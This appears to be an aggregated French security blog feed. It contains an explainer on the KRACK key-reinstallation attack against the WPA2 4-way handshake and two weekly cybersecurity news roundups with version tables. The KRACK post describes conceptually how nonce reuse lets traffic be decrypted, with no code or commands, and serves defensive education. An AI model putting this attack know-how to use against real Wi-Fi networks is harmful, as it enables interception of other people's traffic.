Vincent DEPERIERS

KRACK : Retours sur la vulnérabilité qui a perturbé la sécurité des réseaux Wifi

February 23, 2018, 1:53 am
$
0
0

Introduction

Le premier protocole historiquement utilisé pour sécuriser les réseaux wifi était WEP. Devant les nombreuses vulnérabilités trouvées, un protocole plus sécurisé a vu le jour en 2004 : WPA2, respectant la norme 802.11i. Depuis 2004, aucune faille n’a été trouvée sur le protocole même. Mieux, le protocole WPA2 a été prouvé formellement comme étant sécurisé.

Malgré cela, le 16 Octobre 2017, des vulnérabilités sur le protocole WPA2 accompagnées d’une preuve de concept (« KRACK ») ont été publiées. En effet une vulnérabilité dans les 4-handshake échangés lors de la connexion d’un client à un point d’accès wifi a été trouvé. Ces handshakes permettent la négociation de la clef de chiffrement utilisée pour la sécurisation des échanges sur le réseau wifi. Selon le protocole utilisé pour la protection des données sur le réseau un attaquant peut au moins déchiffrer les données transitant sur le réseau et au mieux forger lui-même des paquets.


Rappel sur le wifi

Généralités

Le wifi est un protocole de communication sans fil local régi par un ensemble de normes (normes IEEE 802.11) qui ont évoluées au fur et à mesure du temps. Ces évolutions concernent aussi les moyens mis en place pour sécuriser l’utilisation de ces réseaux. Les trois protocoles de sécurisation du Wifi sont les suivants :
  • WEP, fait partie de la norme 802.11 ratifiée en 1999
  • WPA respecte en grande partie la norme 802.11i et a été mis en place afin de remplacer le WEP en attendant que la norme 802.11i soit terminée
  • WPA2 respecte tous les éléments obligatoires de la norme 802.11i

Le protocole le plus répandu est WPA2 mais WPA n’a pas totalement disparu. Ces deux protocoles utilisent différents algorithmes de chiffrement pour protéger les données transitant sur le réseau : TKIP (WPA), AES-CCM ou AES-GCM (WPA2).


Focus sur les algorithmes de chiffrement utilisés

Le chiffrement par WPA-TKIP n’était qu’une solution temporaire remédiant à nombre de vulnérabilités de WEP et mis en place en attendant la solution finale qui était WPA2-CCM. Bien que cette dernière solution soit la plus utilisée, le chiffrement WPA2-GCM respecte une norme plus récente et il est attendu que son implémentation soit de plus en plus respectée dans les années à venir.
Le chiffrement WPA-TKIP est un chiffrement par flot basé sur RC4 et l’intégrité des messages est contrôlé par un algorithme appelé Michael.

Les deux autres algorithmes de chiffrements sont des algorithmes opérant par bloc et respectant le même mode d’opération : un chiffrement basé sur un compteur, c’est-à-dire que la clef utilisée pour chiffrer chaque bloc est calculé en fonction d’une clef et d’un compteur (un nombre aléatoire différent pour chaque chiffrement de bloc). Ainsi le même texte clair peut être chiffré deux fois sans donner le même texte chiffré.



L’intégrité des messages est vérifiée à l’aide de CBC-MAC pour WPA-CCM et par GMAC pour WPA-GCM.

4-way handshake

Lors d’une connexion d’un client à un point d’accès Wi-Fi sécurisé, quatre messages Handshakes sont échangées et différentes clefs de chiffrements sont créés :



L’échange des quatre handshakes se fait après la demande d’authentification du client au point d’accès wifi et est initié par ce dernier.

Les deux premiers messages du handshake permettent l’échange des deux nonce (un nonce calculé par le point d’accès wifi et le deuxième calculé par le client) nécessaires à la négociation de la clef de chiffrement qui va être utilisée tout au long de la session pour les messages unicast : la clef PTK (Pairwise Transient Key). 

Le troisième handshake permet de communiquer la clef GTK (Group Temporal Key), chiffrée avec la clef PTK, et utilisée pour les messages broadcast et multicast. A la suite de ce handshake le client finalise la négociation des clefs de chiffrement en envoyant un dernier handshake et en installant la clef PTK. A la réception du handshake 4 le point d’accès wifi installe à son tour la clef PTK.

Le premier handshake est le seul message dont l’intégrité n’est pas vérifiée. L’intégrité des handshakes 2,3 et 4 est vérifiée grâce au paramètre MIC (Message Integrity Check). 

KRACK

L’attaque a été découverte par deux chercheurs, Mathy VANHOEF et Frank PIESSENS, qui ont rédigé un papier intitulé « Key Reinstallation Atacks : Forcing Nonce Reuse in WPA2. »

Principe de l’attaque

Le principe de l’attaque est d’intercepter les requêtes lors du 4-way handshake entre le client et le point d’accès. En bloquant le handshake 4, le client va installer la PTK et commencer à envoyer des paquets chiffrés. Néanmoins le point d’accès n’ayant jamais eu confirmation de la réception du handshake 3 par le client, le handshake 3 sera renvoyé et la clé PTK sera réinstallé sur le poste du client :


La réinstallation de la clé PTK va mener à la réinitialisation du vecteur d’initialisation utilisé dans les différents chiffrements. 

Or, pour reprendre les terminologies utilisées lors du paragraphe « Focus sur les algorithmes de chiffrement utilisés», le vecteur d’initialisation est utilisé comme base du compteur. C’est-à-dire que c’est à partir du vecteur d’initialisation que les valeurs du compteur vont être générées. En réinitialisant le vecteur d’initialisation à la même valeur, le compteur va prendre deux fois la même valeur. Ainsi en réalisant un XOR entre le Msg4 (encadré en noir ci-dessus) et le Msg4 chiffré (encadré en rouge ci-dessus), on obtient la clef de chiffrement utilisé pour le message « Data » (encadré en violet).

Exploitation

Néanmoins cette attaque, dans les conditions présentées ci-dessus, reste assez théorique. En effet sans le Msg4 non chiffré (encadré en noir) il serait impossible de retrouver la clef de chiffrement et donc de retrouver le message « Data » en clair. Le nombre de paquet qu’il est donc possible de déchiffrer est très limité.
C’est dans le cas de l’utilisation du logiciel wpa_supplicant (version 2.4 et versions suivantes) que l’attaque se révèle redoutablement efficace. En effet le client va alors réinstaller une PTK nulle permettant alors à un attaquant de déchiffrer tout les paquets comme démontré dans le PoC (« proof of concept ») KRACK.
Des patchs pour wpa_supplicant sont maintenant disponibles.

Conclusion

La probabilité qu’un attaquant puisse exploiter cette vulnérabilité pour accéder à des informations sensibles reste assez faible (en dehors de wpa_supplicant), bien que la probabilité ne soit pas nulle. Il faut bien entendu mettre ces systèmes à jour aussi minime que soit le risque.
Néanmoins l’intérêt de la découverte de cette faille ne réside pas seulement dans son aspect pratique mais aussi dans ce qu’elle nous apprend. Deux leçons principales peuvent être tirées de la découverte de cette vulnérabilité. La première est l’échec de test unitaire en sécurité : le handshake et les protocoles de chiffrement sont prouvés sécurisés. Néanmoins la combinaison des deux ne l’est pas. La deuxième est qu’une manière efficace d’éprouver la sécurité en informatique est de rendre les ressources opensource. Comme le remarque justement Matthew Green sur son blog (https://blog.cryptographyengineering.com/2017/10/16/falling-through-the-kracks/), les standards IEEE sont difficiles d’accès même pour les chercheurs. Ce qui explique qu’il ait fallu pratiquement 14 ans pour découvrir la vulnérabilité.

Le standard WPA3, plus sécurisé, est en cours de rédaction et promet quatre nouvelles fonctionnalités dont une protection robuste même en cas de mot de passe faible.


Florian DESMONS

Sources

Wi-Fi Alliance. Technical Note: Removal of TKIP from Wi-Fi Devices, March 2015.

CERT-W : Retours sur l'actualité de la semaine du 19 au 25 février

March 2, 2018, 1:27 am
$
0
0

Comme chaque semaine, retrouvez notre revue d'actualité de la sphère cyber-sécurité. Cette compilation de brèves vous permettra d'alimenter les discussions des prochaines pauses cafés !

Veille cybercriminalité

MWR Labs propose une méthode de découverte de chemins de compromission au sein d'un environnement Active Directory via les GPO

Sources :

Comment tirer parti des images de démarrage PXE lors de tests d'intrusion dans un environnement Windows

Sources :

La banque centrale russe révèle que 6 millions de dollars ont été volés via des attaques sur le réseau SWIFT de banques russes en 2017

Sources :

Akamai publie son rapport trimestriel sur les principales attaques Web et révèle que plus de 30 % des tentatives d'authentification sont malveillantes

Sources :

Le SI des organisateurs des Jeux Olympiques de Pyeongchang a été la cible d'un malware ayant entrainé différents dénis de service

Sources :

Kaspersky fait une synthèse des attaques ayant visé les institutions financières en 2017

Sources :

Veille vulnérabilité

Des vulnérabilités critiques découvertes dans l'implémentation SAML de produits populaires

Sources :

DuoSecurity publie l'outil CloudMapper permettant une visualisation simple des actifs liés à un compte AWS

Sources :

PentestPartners détaille comment intercepter les flux Bluetooth issus d'une application mobile avec l'outil d'instrumentation Frida

Sources :

Red Hat détaille comment Oracle a entrepris de corriger l'exploitation de failles liées à l'exécution de code sérialisé

Sources :

Comment bruteforcer un volume chiffré au moyen de la solution Linux Full Disk Encryption (LUKS) avec Hashcat

Sources :

L'éditeur de solution d'analyse forensics Cellebrite révèle être en mesure de déverrouiller les terminaux Apple sous iOS 11

Sources :

Des centaines de milliers de serveurs Memcached accessibles sur Internet récemment utilisés pour des attaques DDoS

Sources :

Indicateurs de la semaine

Le leak de la semaine - RiskBasedSecurity publie son étude autour des fuites d'information et en recense au total 5 200 pour l'année 2017

Sources :

L'attaque de la semaine - Une tentative de vol de 2 millions de dollars via le système SWIFT d'une banque indienne échoue

Sources :

Suivi des versions

Produits
Version actuelle
Adobe Flash Player
28.0.0.161
Adobe Acrobat Reader DC
2018.011.20035
Java
Version 8 Update 161
Mozilla Firefox
58.0.2
Google Chrome
64.0.3282.186
VirtualBox
5.2.8
CCleaner
5.40.6411

Thomas DEBIZE

CERT-W : Retours sur l'actualité de la semaine du 26 février au 4 mars 2018

March 8, 2018, 2:56 am
$
0
0

Comme chaque semaine, retrouvez notre revue d'actualité de la sphère cyber-sécurité. Cette compilation de brèves vous permettra d'alimenter les discussions des prochaines pauses cafés !
Retrouvez également le focus de la semaine par Vincent DEPERIERS, une Introduction au Software Defined Radio (SDR).

Veille cybercriminalité

5 méthodes pour trouver des machines sur lesquelles des processus tournent en tant qu'admin de domaine

L'identification de processus lancés avec des privilèges administrateur du domaine est la première étape dans l'impersonification de tels droits. NetSpi présente dans cet article 5 méthodes pour identifier ces processus.

L'impact des mises à jour Windows 10 dans l'investigation forensic

Lors de l'installation des mises à jour majeures de Windows 10, la date d'installation est réinitialisée et les journaux supprimés, ce qui peut avoir un lourd impact dans une investigation forensic.

2,4 millions d'utilisateurs ajoutés à la liste des victimes de la brèche Equifax

Equifax, victime d'une faille de sécurité majeure en 2017, avait annoncé le vol des données personnelles de plus de 145 millions de ses utilisateurs. 2,4 millions d'utilisateurs qui n'avaient pas encore été identifiés viennent s'ajouter à la liste des victimes.

Veille vulnérabilité

Microsoft a publié une nouvelle mise à jour de sécurité pour lutter contre la vulnérabilité Spectre

La mise à jour qui touche le microcode est cependant réservée aux machines Windows 10 disposant de la version Fall Creator Update ou les Windows Server Core avec Skylake.

Une vulnérabilité affecte les SSO basés sur SAML

Une vulnérabilité touche certaines implémentations du langage SAML. Cette vulnérabilité affecte la manière dont sont traités les commentaires XML lors du calcul de la signature.

HP a corrigé une vulnérabilité dans son outil d'administration à distance nommé Integrated Light-Out 3

La vulnérabilité corrigée permet à un attaquant à distance non authentifié de réaliser un déni de service sur les serveurs qui utilisent l'outil.

Indicateurs de la semaine

Le leak de la semaine - 23 000 certificats SSL du vendeur Trustico révoqués après leur publication

Suite au retrait prévu de certaines Autorités de Certification Symantec des magasins de confiance, la société de revente de certificats Trustico a souhaité procéder à la révocation de quelques 50.000 certificats. Afin de prouver à la société Digicert que les certificats avaient été compromis, le CEO de Trustico a envoyé par email les 23.000 clés privées associés à ces certificats, ce qui a eu pour effet de provoquer leur révocation sous 24h.

L'attaque de la semaine - Github victime de la plus grosse attaque par déni de service distribué (DDoS) jamais rencontrée

Ce 28 février, Github a subi une attaque DDoS dont le traffic est monté jusqu'à 1,35 Tbps. Cette attaque repose sur l'exploitation du protocole Memcached, qui fournit des services de mise en cache à destination des applications web.

Suivi des versions

Produits
Version actuelle
Adobe Flash Player
28.0.0.161
Adobe Acrobat Reader DC
2018.011.20035
Java
Version 8 Update 161
Mozilla Firefox
58.0.2
Google Chrome
64.0.3282.192
VirtualBox
5.8.2
CCleaner
5.40.6411

Nicolas DAUBRESSE
Viewing all 125 articles
Browse latest View live
Search